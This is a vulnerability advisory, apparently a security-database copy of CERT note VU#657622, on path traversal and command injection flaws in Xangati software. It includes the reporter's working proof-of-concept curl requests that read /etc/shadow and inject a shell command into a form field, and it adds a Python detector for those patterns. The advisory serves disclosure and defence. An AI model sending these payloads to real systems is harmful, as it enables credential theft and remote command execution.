Executive Summary



This alert is flagged as belonging to the CWE/SANS Top 25 Common Weakness Enumeration list.
Summary
Title: Xangati software release contains relative path traversal and command injection vulnerabilities
Information
Name: VU#657622
First vendor publication: 2014-04-14
Vendor: VU-CERT
Last vendor modification: 2014-04-14
Severity (vendor): N/A
Revision: M

Security-Database Scoring CVSS v3

CVSS vector: N/A
Overall CVSS score: N/A
Base score: N/A
Environmental score: N/A
Impact subscore: N/A
Temporal score: N/A
Exploitability subscore: N/A

Security-Database Scoring CVSS v2

CVSS vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CVSS base score: 9
Attack range: Network
CVSS impact score: 10
Attack complexity: Low
CVSS exploit score: 8
Authentication: Requires single instance

Detail

Vulnerability Note VU#657622

Xangati software release contains relative path traversal and command injection vulnerabilities

Original Release date: 14 Apr 2014 | Last revised: 14 Apr 2014

Overview

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

Description

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

CWE-23: Relative Path Traversal - CVE-2014-0358
The reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities.

curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5

curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/Installer'

curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'

CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359
The reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability.

curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://127.10.10.5/servlet/Installer'

The CVSS score below is for CVE-2014-0359.

Impact

A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.

Solution

Apply an Update

Upgrade to XSR11 or XNR 7 for the appropriate product.
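
A defender-side screen for the request patterns quoted in the Description, added here as an example and not part of the CERT note or Xangati's code: it flags ".." segments in the path-carrying parameters and shell metacharacters in "params". The endpoint and parameter names are taken from the requests in this note; the sample bodies, the metacharacter set and the function names are constructed for illustration.

```python
from urllib.parse import unquote, unquote_plus

# Endpoints and parameter names come from the requests quoted in this note.
ENDPOINTS = {"/servlet/MGConfigData", "/servlet/Installer"}
PATH_PARAMS = {"file", "download", "binfile"}
CMD_PARAMS = {"params"}
SHELL_META = set(";|&`$<>\\'\"\n")  # assumed set of characters to flag


def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) before inspection."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def has_traversal(value):
    """True if any path segment is '..', with a backslash treated like '/'."""
    return ".." in decode_fully(value).replace("\\", "/").split("/")


def inspect_request(path, body):
    """Return sorted (parameter, finding) pairs for one form-encoded POST."""
    if path not in ENDPOINTS:
        return []
    findings = set()
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if name in PATH_PARAMS and has_traversal(value):
            findings.add((name, "path-traversal"))
        if name in CMD_PARAMS and SHELL_META & set(decode_fully(value)):
            findings.add((name, "shell-metacharacter"))
    return sorted(findings)


# Constructed sample requests, modelled on the bodies shown in this note.
SAMPLES = [
    ("/servlet/MGConfigData", "key=k&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../etc/shadow"),
    ("/servlet/MGConfigData", "key=k&binfile=%2Fourlogs%2F%252e%252e%2Fx"),
    ("/servlet/Installer", "key=k&falconConfig=validateTest&params=gui_input_test.pl&params=-p+localhost;+YES"),
    ("/servlet/MGConfigData", "key=k&request=download&download=%2Ffloodguard%2Fdata%2Freport.csv"),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, inspect_request(path, body))
```

The second sample is double-encoded, which is why values are decoded repeatedly before the segment check.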

Vendor Information

Vendor: Xangati Inc
Status: Affected
Date notified: 23 Jan 2014
Date updated: 11 Apr 2014

CVSS Metrics

Group          Score  Vector
Base           9.4    AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal       8.2    E:ND/RL:OF/RC:C
Environmental  2.1    CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

  • https://cwe.mitre.org/data/definitions/78.html
  • https://cwe.mitre.org/data/definitions/23.html
  • http://xangati.com/products/

Credit

Thanks to Jan Kadijk for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

  • CVE IDs: CVE-2014-0358, CVE-2014-0359
  • Date Public: 14 Apr 2014
  • Date First Published: 14 Apr 2014
  • Date Last Updated: 14 Apr 2014
  • Document Revision: 11

Original Source

Url : http://www.kb.cert.org/vuls/id/657622

CWE : Common Weakness Enumeration

% Id Name
50 % CWE-78 Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection') (CWE/SANS Top 25)
50 % CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE/SANS Top 25)

CPE : Common Platform Enumeration

Type Description Count
Application 1
Application 1

Alert History

Date Information
2014-04-16 13:27:44
  • Multiple Updates
2014-04-15 17:23:36
  • Multiple Updates
2014-04-15 00:19:25
  • First insertion